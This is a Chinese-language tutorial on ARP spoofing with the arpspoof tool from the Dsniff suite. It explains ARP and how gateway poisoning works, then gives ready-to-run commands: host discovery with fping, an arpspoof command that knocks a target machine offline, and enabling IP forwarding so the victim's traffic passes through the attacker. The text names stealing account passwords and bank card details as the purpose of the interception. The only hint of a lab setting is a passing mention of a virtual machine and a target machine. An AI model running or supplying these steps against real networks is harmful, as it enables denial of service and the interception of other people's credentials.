⭐使用工具:arpspoof
什么是ARP?
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的 低层协议,负责将某个IP地址解析成对应的MAC地址。
什么是ARP欺骗?
从影响网络连接通畅的方式来看,ARP欺骗分为两种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。
实际上ARP欺骗是一种中间人攻击,攻击者通过毒化受害者的ARP缓存,将网关的MAC替换成攻击者的MAC,于是攻击者的主机实际上就充当了受害主机的网关,之后攻击者就可以截获受害者发出和接到的数据包,从中获取账号密码、银行卡信息等。
特别提示:
1、arpspoof是“Dsniff网络嗅探工具包“其中的一个工具;
2、使用arpspoof前内核“IP转发”功能(或完成相同的功能程序,例如fragrouter)必须提前打开。
一、ARP断网攻击用法
1.先ping目标主机,ping通的主机才能欺骗; 2.若是不知目标主机IP,那就先查看本机IP,比如本机是192.168.1.201; 3.可以用fping -asg 192.168.1.0/24查看局域网内所有存活的主机IP,推荐查看IP列表中存 活的IP,因为有的IP不能直接给出是存活的; 4.使用模板:arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host 即:arpspoof -i eth0 -t 192.168.1.201 192.168.1.1 5.如此就能使目标主机在ARP欺骗期间处于断网状态。 |
ifconfig
fping -asg 192.168.1.0/24
ping 192.168.1.201
arpspoof -i eth0 -t 192.168.1.201 192.168.1.1
提示:
-i interface 指定要使用的接口。
-c own|host|both 指定范围own|host|both(自己|主机|两者)。
-t target 指定一台特定主机为ARP中毒(如果未指定,则为LAN上的所有主机)。
-r
host 指定您希望拦截数据包的主机(通常是本地网关)。
二、开启流量转发
使目标的IP流量经过我的网卡,进行IP流量转发,让目标主机正常上网:
1.ARP欺骗之前先开启流量转发,使用echo 1 > /proc/sys/net/ipv4/ip_forward 2.使用命令:cat /proc/sys/net/ipv4/ip_forward,显示1表示成功开启转发功能,0表示未 开启; 3.另开一个窗口:arpspoof -i eth0 -t 192.168.1.201 192.168.1.1进行欺骗; 4.若目标主机能正常上网,则流量转发成功,否则流量转发未成功; 5.本机(虚拟机)就被靶机当成网关了(即实际网关和攻击主机的物理地址一样) |
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.201 192.168.1.1